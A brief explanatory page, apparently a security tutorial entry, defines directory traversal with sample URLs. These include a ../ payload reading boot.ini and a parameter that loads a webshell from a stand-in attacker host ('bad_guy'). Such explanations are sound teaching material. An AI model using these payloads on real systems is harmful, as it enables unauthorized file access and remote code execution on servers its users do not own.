Directory Traversal
A directory traversal – sometimes called path traversal – is when an attacker attempts to access files outside of the main web root directory. When the server is vulnerable to directory traversal it can allow the attack broad access into server, allowing not only the ability to read the contents of files but also potentially run arbitrary commands depending on what they can access.
Basic Example
http://vulnerable_site.com/get_file.asp?file=file.pdf
If the vulnerable_site.com was impacted by directory traversal, and let’s say the attacker wanted the boot.ini file in C:\, they could then theoritically run:
http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini
This becomes much more dangerous when the attacker is able to access binaries that can run code, or are from outside sources.
http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp